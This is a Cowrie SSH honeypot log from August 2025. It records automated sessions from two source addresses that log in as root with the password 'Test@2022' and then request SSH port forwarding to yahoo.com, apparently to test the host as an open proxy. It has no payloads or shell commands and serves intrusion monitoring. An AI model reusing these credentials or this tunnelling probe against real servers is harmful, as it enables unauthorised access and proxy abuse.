{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":34999,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c3a7ea87225","protocol":"ssh","message":"New connection: 213.209.150.239:34999 (1.2.3.4:22) [session: 9c3a7ea87225]","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.467257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.468053Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.515081Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.749397Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26112,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26112","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.797648Z","session":"9c3a7ea87225"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.844813Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20036,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20036","sensor":"my-vps","timestamp":"2025-08-26T01:05:08.981281Z","session":"9c3a7ea87225"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.028275Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.075955Z","src_ip":"213.209.150.239","session":"9c3a7ea87225"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35051,"dst_ip":"1.2.3.4","dst_port":22,"session":"1212ed8e8318","protocol":"ssh","message":"New connection: 213.209.150.239:35051 (1.2.3.4:22) [session: 1212ed8e8318]","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.131854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.132520Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.189304Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.471380Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":19118,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19118","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.529412Z","session":"1212ed8e8318"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.586161Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22795,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22795","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.743000Z","session":"1212ed8e8318"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.799964Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.857715Z","src_ip":"213.209.150.239","session":"1212ed8e8318"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35100,"dst_ip":"1.2.3.4","dst_port":22,"session":"d009a753a754","protocol":"ssh","message":"New connection: 213.209.150.239:35100 (1.2.3.4:22) [session: d009a753a754]","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.913050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.913692Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:09.970320Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.251786Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11904,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11904","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.309180Z","session":"d009a753a754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.365731Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":23037,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:23037","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.518900Z","session":"d009a753a754"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.575430Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.632507Z","src_ip":"213.209.150.239","session":"d009a753a754"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35155,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad5fb1bea07c","protocol":"ssh","message":"New connection: 213.209.150.239:35155 (1.2.3.4:22) [session: ad5fb1bea07c]","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.679158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.680456Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.727373Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":51650,"dst_ip":"1.2.3.4","dst_port":22,"session":"d575ba220890","protocol":"ssh","message":"New connection: 27.112.78.170:51650 (1.2.3.4:22) [session: d575ba220890]","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.914628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.915564Z","src_ip":"27.112.78.170","session":"d575ba220890"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:10.963411Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14103,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14103","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.011344Z","session":"ad5fb1bea07c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.059427Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.189251Z","src_ip":"27.112.78.170","session":"d575ba220890"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":7394,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7394","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.193245Z","session":"ad5fb1bea07c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.240389Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.288214Z","src_ip":"213.209.150.239","session":"ad5fb1bea07c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":35198,"dst_ip":"1.2.3.4","dst_port":22,"session":"dea0c1ded2cb","protocol":"ssh","message":"New connection: 213.209.150.239:35198 (1.2.3.4:22) [session: dea0c1ded2cb]","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.334574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.335386Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.382620Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.617178Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20619,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20619","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.665573Z","session":"dea0c1ded2cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.712821Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16825,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16825","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.849619Z","session":"dea0c1ded2cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.896971Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:11.945056Z","src_ip":"213.209.150.239","session":"dea0c1ded2cb"}
